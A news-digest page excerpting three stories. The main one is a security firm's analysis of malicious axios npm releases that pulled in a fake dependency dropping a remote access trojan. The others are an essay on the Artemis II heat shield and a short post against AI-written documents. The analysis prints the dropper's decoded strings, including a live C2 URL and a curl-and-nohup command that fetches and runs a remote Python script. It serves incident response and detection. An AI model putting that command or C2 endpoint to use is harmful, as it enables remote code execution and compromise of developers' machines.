10 interesting stories served every morning and every evening.




1 1,602 shares, 109 trendiness

Malicious Versions Drop Remote Access Trojan

Hijacked main­tainer ac­count used to pub­lish poi­soned ax­ios re­leases in­clud­ing 1.14.1 and 0.30.4. The at­tacker in­jected a hid­den de­pen­dency that drops a cross plat­form RAT. We are ac­tively in­ves­ti­gat­ing and will up­date this post with a full tech­ni­cal analy­sis. StepSecurity is host­ing a com­mu­nity town hall on this in­ci­dent on April 1st at 10:00 AM PT - Register Here.axios is the most pop­u­lar JavaScript HTTP client li­brary with over 100 mil­lion weekly down­loads. On March 30, 2026, StepSecurity iden­ti­fied two ma­li­cious ver­sions of the widely used ax­ios HTTP client li­brary pub­lished to npm: ax­ios@1.14.1 and ax­ios@0.30.4. The ma­li­cious ver­sions in­ject a new de­pen­dency, plain-crypto-js@4.2.1, which is never im­ported any­where in the ax­ios source code. Its sole pur­pose is to ex­e­cute a postin­stall script that acts as a cross plat­form re­mote ac­cess tro­jan (RAT) drop­per, tar­get­ing ma­cOS, Windows, and Linux. The drop­per con­tacts a live com­mand and con­trol server and de­liv­ers plat­form spe­cific sec­ond stage pay­loads. After ex­e­cu­tion, the mal­ware deletes it­self and re­places its own pack­age.json with a clean ver­sion to evade foren­sic de­tec­tion.There are zero lines of ma­li­cious code in­side ax­ios it­self, and that’s ex­actly what makes this at­tack so dan­ger­ous. Both poi­soned re­leases in­ject a fake de­pen­dency, plain-crypto-js@4.2.1, a pack­age never im­ported any­where in the ax­ios source, whose sole pur­pose is to run a postin­stall script that de­ploys a cross-plat­form re­mote ac­cess tro­jan. The drop­per con­tacts a live com­mand-and-con­trol server, de­liv­ers sep­a­rate sec­ond-stage pay­loads for ma­cOS, Windows, and Linux, then erases it­self and re­places its own pack­age.json with a clean de­coy. A de­vel­oper who in­spects their node_­mod­ules folder af­ter the fact will find no in­di­ca­tion any­thing went wrong.This was not op­por­tunis­tic. It was pre­ci­sion. The ma­li­cious de­pen­dency was staged 18 hours in ad­vance. Three pay­loads were pre-built for three op­er­at­ing sys­tems. Both re­lease branches were poi­soned within 39 min­utes of each other. Every ar­ti­fact was de­signed to self-de­struct. Within two sec­onds of npm in­stall, the mal­ware was al­ready call­ing home to the at­tack­er’s server be­fore npm had even fin­ished re­solv­ing de­pen­den­cies. This is among the most op­er­a­tionally so­phis­ti­cated sup­ply chain at­tacks ever doc­u­mented against a top-10 npm pack­age.These com­pro­mises were de­tected by StepSecurity AI Package Analyst [1][2] and StepSecurity Harden-Runner. We have re­spon­si­bly dis­closed the is­sue to the pro­ject main­tain­ers.StepSe­cu­rity Harden-Runner, whose com­mu­nity tier is free for pub­lic re­pos and is used by over 12,000 pub­lic repos­i­to­ries, de­tected the com­pro­mised ax­ios pack­age mak­ing anom­alous out­bound con­nec­tions to the at­tack­er’s C2 do­main across mul­ti­ple open source pro­jects. For ex­am­ple, Harden-Runner flagged the C2 call­back to sfr­clak.com:8000 dur­ing a rou­tine CI run in the back­stage repos­i­tory, one of the most widely used de­vel­oper por­tal frame­works. The Backstage team has con­firmed that this work­flow is in­ten­tion­ally sand­boxed and the ma­li­cious pack­age in­stall does not im­pact the pro­ject. The con­nec­tion was au­to­mat­i­cally marked as anom­alous be­cause it had never ap­peared in any prior work­flow run. Harden-Runner in­sights for com­mu­nity tier pro­jects are pub­lic by de­sign, al­low­ing any­one to ver­ify the de­tec­tion: https://​app.stepse­cu­rity.io/​github/​back­stage/​back­stage/​ac­tions/​runs/​23775668703?tab=net­work-events

[Community Webinar] ax­ios Compromised on npm: What We Know, What You Should Do

Join StepSecurity on April 1st at 10:00 AM PT for a live com­mu­nity brief­ing on the ax­ios sup­ply chain at­tack. We’ll walk through the full at­tack chain, in­di­ca­tors of com­pro­mise, re­me­di­a­tion steps, and open it up for Q&A.

Register for the we­bi­nar →

The at­tack was pre-staged across roughly 18 hours, with the ma­li­cious de­pen­dency seeded on npm be­fore the ax­ios re­leases to avoid brand-new pack­age” alarms from se­cu­rity scan­ners:

plain-crypto-js@4.2.0 pub­lished by nr­wise@pro­ton.me — a clean de­coy con­tain­ing a full copy of the le­git­i­mate crypto-js source, no postin­stall hook. Its sole pur­pose is to es­tab­lish npm pub­lish­ing his­tory so the pack­age does not ap­pear as a zero-his­tory ac­count dur­ing later in­spec­tion.

plain-crypto-js@4.2.1 pub­lished by nr­wise@pro­ton.me — ma­li­cious pay­load added. The postin­stall: node setup.js” hook and ob­fus­cated drop­per are in­tro­duced.

ax­ios@1.14.1 pub­lished by com­pro­mised ja­son­saay­man ac­count (email: if­stap@pro­ton.me) — in­jects plain-crypto-js@4.2.1 as a run­time de­pen­dency, tar­get­ing the mod­ern 1.x user base.

ax­ios@0.30.4 pub­lished by the same com­pro­mised ac­count — iden­ti­cal in­jec­tion into the legacy 0.x branch, pub­lished 39 min­utes later to max­i­mize cov­er­age across both re­lease lines.

npm un­pub­lishes ax­ios@1.14.1 and ax­ios@0.30.4. Both ver­sions are re­moved from the reg­istry and the lat­est dist-tag re­verts to 1.14.0. ax­ios@1.14.1 had been live for ap­prox­i­mately 2 hours 53 min­utes; ax­ios@0.30.4 for ap­prox­i­mately 2 hours 15 min­utes. Timestamp is in­ferred from the ax­ios reg­istry doc­u­men­t’s mod­i­fied field (03:15:30Z) — npm does not ex­pose a ded­i­cated per-ver­sion un­pub­lish time­stamp in its pub­lic API.

npm ini­ti­ates a se­cu­rity hold on plain-crypto-js, be­gin­ning the process of re­plac­ing the ma­li­cious pack­age with an npm se­cu­rity-holder stub.

npm pub­lishes the se­cu­rity-holder stub plain-crypto-js@0.0.1-se­cu­rity.0 un­der the npm@npmjs.com ac­count, for­mally re­plac­ing the ma­li­cious pack­age on the reg­istry. plain-crypto-js@4.2.1 had been live for ap­prox­i­mately 4 hours 27 min­utes. Attempting to in­stall any ver­sion of plain-crypto-js now re­turns the se­cu­rity no­tice.

The at­tacker com­pro­mised the ja­son­saay­man npm ac­count, the pri­mary main­tainer of the ax­ios pro­ject. The ac­coun­t’s reg­is­tered email was changed to if­stap@pro­ton.me — an at­tacker-con­trolled ProtonMail ad­dress. Using this ac­cess, the at­tacker pub­lished ma­li­cious builds across both the 1.x and 0.x re­lease branches si­mul­ta­ne­ously, max­i­miz­ing the num­ber of pro­jects ex­posed.Both ax­ios@1.14.1 and ax­ios@0.30.4 are recorded in the npm reg­istry as pub­lished by ja­son­saay­man, mak­ing them in­dis­tin­guish­able from le­git­i­mate re­leases at a glance. Both ver­sions were pub­lished us­ing the com­pro­mised npm cre­den­tials of a lead ax­ios main­tainer, by­pass­ing the pro­jec­t’s nor­mal GitHub Actions CI/CD pipeline.A crit­i­cal foren­sic sig­nal is vis­i­ble in the npm reg­istry meta­data. Every le­git­i­mate ax­ios 1.x re­lease is pub­lished via GitHub Actions with npm’s OIDC Trusted Publisher mech­a­nism, mean­ing the pub­lish is cryp­to­graph­i­cally tied to a ver­i­fied GitHub Actions work­flow. ax­ios@1.14.1 breaks that pat­tern en­tirely — pub­lished man­u­ally via a stolen npm ac­cess to­ken with no OIDC bind­ing and no git­Head:// ax­ios@1.14.0 — LEGITIMATE

_npmUser”: {

name”: GitHub Actions”,

email”: npm-oidc-no-re­ply@github.com,

trustedPublisher”: {

id”: github”,

oidcConfigId”: oidc:9061ef30-3132-49f4-b28c-9338d192a1a9″

// ax­ios@1.14.1 — MALICIOUS

_npmUser”: {

name”: jasonsaayman”,

email”: if­stap@pro­ton.me

// no trust­ed­Pub­lisher, no git­Head, no cor­re­spond­ing GitHub com­mit or tag

}There is no com­mit or tag in the ax­ios GitHub repos­i­tory that cor­re­sponds to 1.14.1. The re­lease ex­ists only on npm. The OIDC to­ken that le­git­i­mate re­leases use is ephemeral and scoped to the spe­cific work­flow — it can­not be stolen. The at­tacker must have ob­tained a long-lived clas­sic npm ac­cess to­ken for the ac­count.Be­fore pub­lish­ing the ma­li­cious ax­ios ver­sions, the at­tacker pre-staged plain-crypto-js@4.2.1 from ac­count nr­wise@pro­ton.me. This pack­age:Mas­quer­ades as crypto-js with an iden­ti­cal de­scrip­tion and repos­i­tory URL point­ing to the le­git­i­mate brix/​crypto-js GitHub repos­i­to­ryCon­tains postinstall”: node setup.js” — the hook that fires the RAT drop­per on in­stall­Pre-stages a clean pack­age.json stub in a file named pack­age.md for ev­i­dence de­struc­tion af­ter ex­e­cu­tion­The de­coy ver­sion (4.2.0) was pub­lished 18 hours ear­lier to es­tab­lish pub­lish­ing his­tory - a clean pack­age in the reg­istry that makes nr­wise look like a le­git­i­mate main­tainer.What changed be­tween 4.2.0 (decoy) and 4.2.1 (malicious)A com­plete file-level com­par­i­son be­tween plain-crypto-js@4.2.0 and plain-crypto-js@4.2.1 re­veals ex­actly three dif­fer­ences. Every other file (all 56 crypto source files, the README, the LICENSE, and the docs) is iden­ti­cal be­tween the two ver­sions:

The 56 crypto source files are not just sim­i­lar; they are bit-for-bit iden­ti­cal to the cor­re­spond­ing files in the le­git­i­mate crypto-js@4.2.0 pack­age pub­lished by Evan Vosberg. The at­tacker made no mod­i­fi­ca­tions to the cryp­to­graphic li­brary code what­so­ever. This was in­ten­tional: any diff-based analy­sis com­par­ing plain-crypto-js against crypto-js would find noth­ing sus­pi­cious in the li­brary files and would fo­cus at­ten­tion on pack­age.json — where the postin­stall hook looks, at a glance, like a stan­dard build or setup task.The anti-foren­sics stub (package.md) de­serves par­tic­u­lar at­ten­tion. After setup.js runs, it re­names pack­age.md to pack­age.json. The stub re­ports ver­sion 4.2.0 — not 4.2.1:// Contents of pack­age.md (the clean re­place­ment stub)

name”: plain-crypto-js”,

version”: 4.2.0″, // ← re­ports 4.2.0, not 4.2.1 — de­lib­er­ate mis­match

description”: JavaScript li­brary of crypto stan­dards.”,

license”: MIT,

author”: { name”: Evan Vosberg”, url”: http://​github.com/​evan­vos­berg },

homepage”: http://​github.com/​brix/​crypto-js,

repository”: { type”: git”, url”: http://​github.com/​brix/​crypto-js.git },

main”: index.js”,

// No scripts” key — no postin­stall, no test

dependencies”: {}

}This cre­ates a sec­ondary de­cep­tion layer. After in­fec­tion, run­ning npm list in the pro­ject di­rec­tory will re­port plain-crypto-js@4.2.0 — be­cause npm list reads the ver­sion field from the in­stalled pack­age.json, which now says 4.2.0. An in­ci­dent re­spon­der check­ing in­stalled pack­ages would see a ver­sion num­ber that does not match the ma­li­cious 4.2.1 ver­sion they were told to look for, po­ten­tially lead­ing them to con­clude the sys­tem was not com­pro­mised.# What npm list re­ports POST-infection (after the pack­age.json swap):

$ npm list plain-crypto-js

mypro­ject@1.0.0

└── plain-crypto-js@4.2.0 # ← re­ports 4.2.0, not 4.2.1

# but the drop­per al­ready ran as 4.2.1

# The re­li­able check is the DIRECTORY PRESENCE, not the ver­sion num­ber:

$ ls node_­mod­ules/​plain-crypto-js

aes.js ci­pher-core.js core.js …

# If this di­rec­tory ex­ists at all, the drop­per ran.

# plain-crypto-js is not a de­pen­dency of ANY le­git­i­mate ax­ios ver­sion.The dif­fer­ence be­tween the real crypto-js@4.2.0 and the ma­li­cious plain-crypto-js@4.2.1 is a sin­gle field in pack­age.json:// crypto-js@4.2.0 (LEGITIMATE — Evan Vosberg / brix)

name”: crypto-js”,

version”: 4.2.0″,

description”: JavaScript li­brary of crypto stan­dards.”,

author”: Evan Vosberg”,

homepage”: http://​github.com/​brix/​crypto-js,

scripts”: {

test”: grunt” // ← no postin­stall

// plain-crypto-js@4.2.1 (MALICIOUSnr­wise@pro­ton.me)

name”: plain-crypto-js”, // ← dif­fer­ent name, every­thing else cloned

version”: 4.2.1″, // ← ver­sion one ahead of the real pack­age

description”: JavaScript li­brary of crypto stan­dards.”,

author”: { name”: Evan Vosberg” }, // ← fraud­u­lent use of real au­thor name

homepage”: http://​github.com/​brix/​crypto-js, // ← real repo, wrong pack­age

scripts”: {

test”: grunt”,

postinstall”: node setup.js” // ← THE ONLY DIFFERENCE. The en­tire weapon.

}The at­tacker pub­lished ax­ios@1.14.1 and ax­ios@0.30.4 with plain-crypto-js: ^4.2.1” added as a run­time de­pen­dency — a pack­age that has never ap­peared in any le­git­i­mate ax­ios re­lease. The diff is sur­gi­cal: every other de­pen­dency is iden­ti­cal to the prior clean ver­sion.When a de­vel­oper runs npm in­stall ax­ios@1.14.1, npm re­solves the de­pen­dency tree and in­stalls plain-crypto-js@4.2.1 au­to­mat­i­cally. npm then ex­e­cutes plain-crypto-js’s postin­stall script, launch­ing the drop­per.Phan­tom de­pen­dency: A grep across all 86 files in ax­ios@1.14.1 con­firms that plain-crypto-js is never im­ported or re­quire()’d any­where in the ax­ios source code. It is added to pack­age.json only to trig­ger the postin­stall hook. A de­pen­dency that ap­pears in the man­i­fest but has zero us­age in the code­base is a high-con­fi­dence in­di­ca­tor of a com­pro­mised re­lease.The Surgical Precision of the InjectionA com­plete bi­nary diff be­tween ax­ios@1.14.0 and ax­ios@1.14.1 across all 86 files (excluding source maps) re­veals that ex­actly one file changed: pack­age.json. Every other file — all 85 li­brary source files, type de­f­i­n­i­tions, README, CHANGELOG, and com­piled dist bun­dles — is bit-for-bit iden­ti­cal be­tween the two ver­sions.# File diff: ax­ios@1.14.0 vs ax­ios@1.14.1 (86 files, source maps ex­cluded)

DIFFERS: pack­age.json

Total dif­fer­ing files: 1

Files only in 1.14.1: (none)

Files only in 1.14.0: (none)# –- ax­ios/​pack­age.json (1.14.0)

# +++ ax­ios/​pack­age.json (1.14.1)

- version”: 1.14.0″,

+ version”: 1.14.1″,

scripts”: {

fix”: eslint –fix lib/**/*.​js”,

- prepare”: husky”

dependencies”: {

follow-redirects”: ^2.1.0″,

form-data”: ^4.0.1″,

proxy-from-env”: ^2.1.0″,

+ plain-crypto-js”: ^4.2.1″

}Two changes are vis­i­ble: the ver­sion bump (1.14.0 → 1.14.1) and the ad­di­tion of plain-crypto-js. There is also a third, less ob­vi­ous change: the prepare”: husky” script was re­moved. husky is the git hook man­ager used by the ax­ios pro­ject to en­force pre-com­mit checks. Its re­moval from the scripts sec­tion is con­sis­tent with a man­ual pub­lish that by­passed the nor­mal de­vel­op­ment work­flow — the at­tacker edited pack­age.json di­rectly with­out go­ing through the pro­jec­t’s stan­dard re­lease tool­ing, which would have re-added the husky pre­pare script.The same analy­sis ap­plies to ax­ios@0.30.3 → ax­ios@0.30.4:# –- ax­ios/​pack­age.json (0.30.3)

# +++ ax­ios/​pack­age.json (0.30.4)

- version”: 0.30.3″,

+ version”: 0.30.4″,

dependencies”: {

follow-redirects”: ^1.15.4″,

form-data”: ^4.0.4″,

proxy-from-env”: ^1.1.0″,

+ plain-crypto-js”: ^4.2.1″

}Again — ex­actly one sub­stan­tive change: the ma­li­cious de­pen­dency in­jec­tion. The ver­sion bump it­self (from 0.30.3 to 0.30.4) is sim­ply the re­quired npm ver­sion in­cre­ment to pub­lish a new re­lease; it car­ries no func­tional sig­nif­i­cance.setup.js is a sin­gle mini­fied file em­ploy­ing a two-layer ob­fus­ca­tion scheme de­signed to evade sta­tic analy­sis tools and con­fuse hu­man re­view­ers.All sen­si­tive strings — mod­ule names, OS iden­ti­fiers, shell com­mands, the C2 URL, and file paths — are stored as en­coded val­ues in an ar­ray named stq[]. Two func­tions de­code them at run­time:_tran­s_1(x, r) — XOR ci­pher. The key OrDeR_7077” is parsed through JavaScript’s Number(): al­pha­betic char­ac­ters pro­duce NaN, which in bit­wise op­er­a­tions be­comes 0. Only the dig­its 7, 0, 7, 7 in po­si­tions 6–9 sur­vive, giv­ing an ef­fec­tive key of [0,0,0,0,0,0,7,0,7,7]. Each char­ac­ter at po­si­tion r is de­coded as:char­Code XOR key[(7 × r × r) % 10] XOR 333_trans_2(x, r) — Outer layer. Reverses the en­coded string, re­places _ with =, base64-de­codes the re­sult (interpreting the bytes as UTF-8 to re­cover Unicode code points), then passes the out­put through _trans_1.The drop­per’s en­try point is _entry(“6202033″), where 6202033 is the C2 URL path seg­ment. The full C2 URL is: http://​sfr­clak.com:8000/​6202033StepSe­cu­rity fully de­coded every en­try in the stq[] ar­ray. The re­cov­ered plain­text re­veals the com­plete at­tack:stq[0] → child_process” // shell ex­e­cu­tion

stq[1] → os” // plat­form de­tec­tion

stq[2] → fs” // filesys­tem op­er­a­tions

stq[3] → http://​sfr­clak.com:8000/ // C2 base URL

stq[5] → win32” // Windows plat­form iden­ti­fier

stq[6] → darwin” // ma­cOS plat­form iden­ti­fier

stq[12] → curl -o /tmp/ld.py -d pack­ages.npm.org/​pro­duct2 -s SCR_LINK && no­hup python3 /tmp/ld.py SCR_LINK > /dev/null 2>&1 &”

stq[13] → package.json” // deleted af­ter ex­e­cu­tion

stq[14] → package.md” // clean stub re­named to pack­age.json

stq[15] → .exe”

stq[16] → .ps1″

stq[17] → .vbs”The com­plete at­tack path from npm in­stall to C2 con­tact and cleanup, across all three tar­get plat­forms.With all strings de­coded, the drop­per’s full logic can be re­con­structed and an­no­tated. The fol­low­ing is a de-ob­fus­cated, com­mented ver­sion of the _entry() func­tion that con­sti­tutes the en­tire drop­per pay­load. Original vari­able names are pre­served; com­ments are added for clar­ity.// setup.js — de-ob­fus­cated and an­no­tated

// SHA-256: e10b1­fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09

...

Read the original on www.stepsecurity.io »

2 733 shares, 49 trendiness

Artemis II Is Not Safe to Fly (Idle Words)

Artemis II Is Not Safe to Fly

Our test fa­cil­i­ties can’t reach the com­bi­na­tion of heat flux, pres­sure, shear stresses, etc., that an ac­tual reen­ter­ing space­craft does. We’re al­ways hav­ing to wait for the flight test to get the fi­nal cer­ti­fi­ca­tion that our sys­tem is good to go.”—Je­remy VanderKam, deputy man­ager for Orion’s heat shield, speak­ing in 2022

On Wednesday, NASA will at­tempt to send four as­tro­nauts around the moon on a mis­sion called Artemis II. This will be sec­ond flight of NASAs SLS rocket, and the first time the 20-year-old Orion cap­sule flies with peo­ple on board.

The trou­ble is that the heat shield on Orion blows chunks. Not in some fig­u­ra­tive, pe­jo­ra­tive sense, but in the sense that when NASA flew this ex­act mis­sion in 2022, large pieces of ma­te­r­ial blew out of Orion’s heat shield dur­ing re-en­try, leav­ing div­ots. Large bolts em­bed­ded in the heat shield also par­tially eroded and melted through.

NASAs ini­tial in­stinct was to cover up the prob­lem. In early press re­leases, they stressed that both rocket and space­craft had per­formed ex­cep­tion­ally, while de­clin­ing to pub­lish the post-flight as­sess­ment re­view. The first men­tion of heat shield dam­age came from Orion pro­gram man­ager Howard Hu on a call with re­porters in March of 2023. Hu said: we ob­served there were more vari­a­tions across the heat shield than we ex­pected; some of the ex­pected char ma­te­r­ial that we would ex­pect com­ing back home ab­lated away dif­fer­ently than what our com­puter mod­els and what our ground test­ing pre­dicted.”

Asked by a jour­nal­ist to quan­tify the char loss in a January 2024 phone call, Moon-to-Mars Deputy Administrator Amit Kshatriya said: it was very small lo­cal­ized ar­eas. Interestingly, it would be much eas­ier for us to an­a­lyze if we had larger chunks and it was more de­fined”. A Lockheed Martin rep­re­sen­ta­tive on the same call added that there was a healthy mar­gin re­main­ing of that vir­gin Avcoat. So it was­n’t like there were large, large chunks.”

It was­n’t un­til May 2024, when the Office of the Inspector General re­leased pho­tographs of the heat shield, that the ex­tent of the dam­age be­came clear. The prob­lem was­n’t char loss or ex­ces­sive ab­la­tion, but deep gouges and holes in many of the Avcoat blocks that com­prise the heat shield.

The Avcoat ma­te­r­ial is not de­signed to come out in chunks. It is sup­posed to char and flake off smoothly, main­tain­ing the over­all con­tours of the heat shield. But Orion is a fat and heavy space­craft, about twice as heavy as the Apollo com­mand mod­ule it is mod­eled af­ter. And the Avcoat heat shield is an ex­per­i­men­tal de­sign. No one has flown a seg­mented heat shield like this at lu­nar re­turn speeds, let alone on a space­craft this heavy.

The sub­stance of the OIG re­port was as alarm­ing as the pic­tures. The OIG iden­ti­fied three is­sues that could po­ten­tially kill the crew on Artemis II:

Heat shield spalling. This is the tech­ni­cal term for all those div­ots. Since spalling leaves voids and gaps in the heat shield ma­te­r­ial, it can ex­pose the un­pro­tected body of the cap­sule and lead to burn­through. Spalling also changes the pat­tern of hy­per­sonic air­flow around the cap­sule, cre­at­ing the po­ten­tial for lo­cal­ized hot spots and cas­cad­ing ef­fects.

Impact from heat shield frag­ments. When spalling sends pieces of heat shield into the hy­per­sonic airstream, they can strike the top of the cap­sule, dam­ag­ing the para­chute com­part­ment. Whether this hap­pened on Artemis I is un­known. As the OIG re­port pointed out with some frus­tra­tion, NASA failed to re­cover ei­ther the para­chutes or the para­chute cover, de­spite mak­ing elab­o­rate plans to do so. Any ev­i­dence of de­bris im­pact is now at the bot­tom of the Pacific Ocean.

Bolt ero­sion. The OIG re­port noted ero­sion and melt­ing in four large sep­a­ra­tion bolts that sit em­bed­ded in the heat shield. These bolts are packed with a heat-re­sis­tant ma­te­r­ial and are sup­posed to be rugged enough to sur­vive re-en­try. But three of the four bolts had melted through, due to a flaw in the heat­ing model NASA had used in de­sign­ing them. The re­port fur­ther noted: separation bolt melt be­yond the ther­mal bar­rier dur­ing reen­try can ex­pose the ve­hi­cle to hot gas in­ges­tion be­hind the heat shield, ex­ceed­ing Orion’s struc­tural lim­its and re­sult­ing in the breakup of the ve­hi­cle and loss of crew.”

So Orion had come back from the moon with dam­age se­vere enough to kill a crew three dif­fer­ent ways. Not good!

This left NASA in a quandary. The Orion cap­sule for Artemis II was al­ready mated to its ser­vice mod­ule. Taking it off to make changes to the heat shield, even if the agency knew what changes to make, would take years. Nor was there room in the sched­ule to con­duct a flight test, or any spare hard­ware to con­duct the flight test with. Each Orion costs north of a bil­lion dol­lars, and the only rocket it can launch on (SLS) costs two to four bil­lion dol­lars a shot, de­pend­ing on how you do the ac­count­ing.

Here it’s worth quot­ing Admiral Harlold Gehman, who chaired the Columbia Accident Investigation board, on what hap­pens or­ga­ni­za­tion­ally when a rigid sched­ule meets an im­mov­able bud­get:

If a pro­gram man­ager is faced with prob­lems and short­falls and chal­lenges, if the sched­ule can­not be ex­tended, he ei­ther needs money, or he needs to cut into mar­gin. There were no other op­tions, so guess what the peo­ple at NASA did? They started to cut into mar­gins. No one di­rected them to do this. No one told them to do this. The or­ga­ni­za­tion did it, be­cause the in­di­vid­u­als in the or­ga­ni­za­tion thought they were de­fend­ing the or­ga­ni­za­tion. They thought they were do­ing what the or­ga­ni­za­tion wanted them to do.

And so NASA looked for ways to talk it­self into be­liev­ing it was safe to fly a de­fec­tive heat shield.

In April 2024, the agency con­vened an in­de­pen­dent re­view panel. The find­ings of that panel were not made pub­lic, but in December NASA an­nounced that it had found a root cause for the heat shield dam­age. The Avcoat on the Artemis I heat shield was not suf­fi­ciently per­me­able, and so gas trapped un­der lay­ers of the ma­te­r­ial had ex­panded and blown pieces out of the heat shield. The process had been ex­ac­er­bated by the re-en­try tra­jec­tory, which had heat­ing oc­cur in two dis­tinct phases.

This was an awk­ward find­ing, since the heat shield NASA would use on Artemis II had been made even less per­me­able, to make it eas­ier to do ul­tra­sonic test­ing. But you fly with the heat shield you have, and the agency said it was con­fi­dent that a change to the re-en­try tra­jec­tory would be more than ad­e­quate to off­set any spalling is­sues.

Somewhat con­fus­ingly, they also an­nounced their in­ten­tion to switch to a new heat shield de­sign, start­ing with Artemis III. In other words, the Artemis II shield was com­pletely safe to fly, but they were never go­ing to fly it af­ter this mis­sion, and the re­place­ment de­sign would be tested for the first time on a fu­ture lu­nar mis­sion, with as­tro­nauts on board.

All of this was kind of pre­pos­ter­ous. As the YouTuber Eager Space has pointed out, if a com­mer­cial crew cap­sule (SpaceX Dragon or Boeing Starliner) re­turned to Earth with the kind of dam­age seen on Orion, NASA would in­sist on a re­design and an un­manned test flight to val­i­date it. But the agency does not hold its flag­ship pro­gram to the high stan­dard it de­mands from com­mer­cial crew, even though the same as­tro­naut lives are at stake.

Nor was it lost on ob­servers that the tools and mod­els NASA used to ar­rive at its new analy­sis were the same ones that had failed to pre­dict the spalling prob­lem in the first place. While the agency was able to work back­wards from flight data to in­duce flak­ing in a test coupon of Avcoat, they had no way of pre­dict­ing how the full-size heat shield would be­have in the new flight con­di­tions it would ex­pe­ri­ence on Artemis II.

You don’t have to be a ran­dom space blog­ger to find all this fishy. The most en­er­getic voice of pub­lic dis­sent has been heat shield ex­pert and Shuttle as­tro­naut Charles Camarda, the for­mer Director of Engineering at Johnson Space Center. Aghast at what he saw as a re­peat of the mo­ti­vated rea­son­ing that had led to the loss of Columbia and Challenger, Camarda be­gan mak­ing noise both in­side and out­side the agency, be­liev­ing that as­tro­nauts’ lives were at stake.

In a show of open­ness, NASA in­vited Camarda and two jour­nal­ists to at­tend a brief­ing on the heat shield in January of 2026, and gave him lim­ited ac­cess to some re­search ma­te­ri­als that have not been made pub­lic. But the ex­pe­ri­ence only deep­ened Camarda’s dis­tress, and he ended up pub­lish­ing a cri de coeur that I en­cour­age every­one to read in full.

In a nut­shell, Camarda ar­gues that NASA is demon­strat­ing the same dys­func­tion that led to the Columbia and Challenger dis­as­ters. Faced with an un­ex­pected en­gi­neer­ing fail­ure, it has built toy mod­els to con­vince it­self that the con­clu­sion it wants to reach (it’s safe to fly) are sup­ported by ev­i­dence. These toy mod­els are not grounded in physics, but be­cause they ap­pear to be quan­ti­ta­tive, they cre­ate a false sense of se­cu­rity and un­der­stand­ing, an epis­temic fig leaf for man­age­ment to hide be­hind.

Put more sim­ply, NASA is go­ing to fly Artemis II based on vibes, hop­ing that what­ever hap­pened to the heat shield on Artemis I won’t get bad enough to harm the crew on Artemis II.

A screen shot from re-en­try dur­ing Artemis I, show­ing a large burn­ing frag­ment of the Orion heat shield

What makes the sit­u­a­tion even more frus­trat­ing is the fact that, by the pro­gram’s own logic, there’s no rea­son to fly Artemis II with a crew at all.

In the orig­i­nal scheme for Artemis, Artemis II was the only op­por­tu­nity to fly Orion with as­tro­nauts on board be­fore the lu­nar land­ing at­tempt on Artemis III. Artemis III would be a scary mis­sion full of tech­ni­cal firsts (first land­ing, first use of the lu­nar lan­der, first dock­ing in deep space, etc), and it made sense to re­tire as much tech­ni­cal risk as pos­si­ble on a dry run around the Moon.

But in early 2026, NASA de­cided to add an ad­di­tional Artemis mis­sion to the man­i­fest. The new Artemis III would fly in 2027 as a near-Earth mis­sion to test dock­ing with what­ever lu­nar lan­der (Blue Origin or SpaceX) was avail­able. The first moon land­ing would be pushed back to the mis­sion af­ter that, Artemis IV.

This change re­moved any ra­tio­nale for fly­ing as­tro­nauts on Artemis II. If there are is­sues with Orion, it is safer for the crew to en­counter them in Earth or­bit than on a long trip around the Moon. And Artemis II could fly just as eas­ily with­out as­tro­nauts on board, giv­ing ground con­trollers launch ex­pe­ri­ence and val­i­dat­ing (or dis­cred­it­ing) NASAs heat shield model with­out en­dan­ger­ing a crew. NASA would lose a lit­tle face by es­sen­tially re­peat­ing Artemis I, but do­ing so would demon­strate that the agency re­ally be­lieves in the safety cul­ture it so of­ten gives lip ser­vice to.

Unfortunately, it looks like sunk costs and is­sues of face will win the day.

The en­gi­neers and man­agers at NASA are not stu­pid, and they are not cav­a­lier with as­tro­naut’s lives. They’ve read the Rogers Commission and CAIB re­ports, and many of them re­mem­ber Challenger and Columbia first­hand. But they ex­ist in a con­text.

That con­text is a moon pro­gram that has spent close to $100 bil­lion and 25 years with noth­ing to show for it­self, at an agency that has just ex­pe­ri­enced mass fir­ings and been through a near-death ex­pe­ri­ence with its sci­ence bud­get. The charis­matic new Administrator has staked his rep­u­ta­tion on in­creas­ing launch ca­dence, and set an ex­plicit goal of land­ing as­tro­nauts on the Moon be­fore President Trump’s term ex­pires in January of 2029.

So peo­ple are ty­ing them­selves into pret­zels to avoid say­ing the ob­vi­ous, that the Orion heat shield needs a suc­cess­ful flight test at lu­nar re-en­try speeds to avoid un­ac­cept­able risks to the crew.

If the Artemis II crew dies dur­ing re-en­try, we’ll get an­other lav­ishly re­searched re­port lay­ing out con­trib­u­tory fac­tors that are plainly vis­i­ble to any­one fol­low­ing the pro­gram right now. The space pro­gram will be de­layed by years, wait­ing for in­ves­ti­ga­tions to fin­ish and the wrath of Congress to abate. NASA will beat it­self up and add more lay­ers of safety bu­reau­cracy, un­til the same pro­gram pres­sures lead it to make the same mis­take again on a fu­ture flight.

It’s likely—hope­fully very likely—that Artemis II will land safely. But do we re­ally have to wait for as­tro­nauts to die to re-learn the same lessons a third time?

Good luck and god­speed to the as­tro­nauts on Artemis II.

If you en­joy my writ­ing on space, I in­vite you to sub­scribe to my Substack, Mars for the Rest of Us, where I write weekly short es­says on top­ics around Mars ex­plo­ration.

...

Read the original on idlewords.com »

3 691 shares, 29 trendiness

Don't Let AI Write For You

Don’t Let AI Write For You Go does not al­low truthi­ness Simple Semaphore With a Buffered Channel in Go 🎙️, 🎙️ - Is this thing on? What hap­pens when you go to this site? Everything Useful I Know About kubectl Choosing the right scope func­tion in Kotlin What do data classes give you in Kotlin? How sim­i­lar is the ex­e­cu­tion of Java and JavaScript?

Don’t Let AI Write For You When you write a doc­u­ment or es­say, you are pos­ing a ques­tion and then an­swer­ing it. For ex­am­ple, a PRD an­swers the ques­tion, What should we build?” A tech­ni­cal spec an­swers, How should we build it?” Sometimes the ques­tion is more dif­fi­cult to an­swer—“What are we even try­ing to ac­com­plish?” And with every at­tempt at an­swer­ing, you re­flect on whether you’re ask­ing the right ques­tion.

But now, of course, we have LLMs. I’m see­ing an in­creas­ing amount of LLM-generated doc­u­ments, ar­ti­cles, and es­says. I want to cau­tion against this. Each LLM-generated doc­u­ment is a missed op­por­tu­nity to think and build trust.

The goal of writ­ing is not to have writ­ten. It is to have in­creased your un­der­stand­ing, and then the un­der­stand­ing of those around you. When you are tasked to write some­thing, your job is to go into the murk­i­ness and come out of it with struc­ture and un­der­stand­ing. To con­quer the un­known.

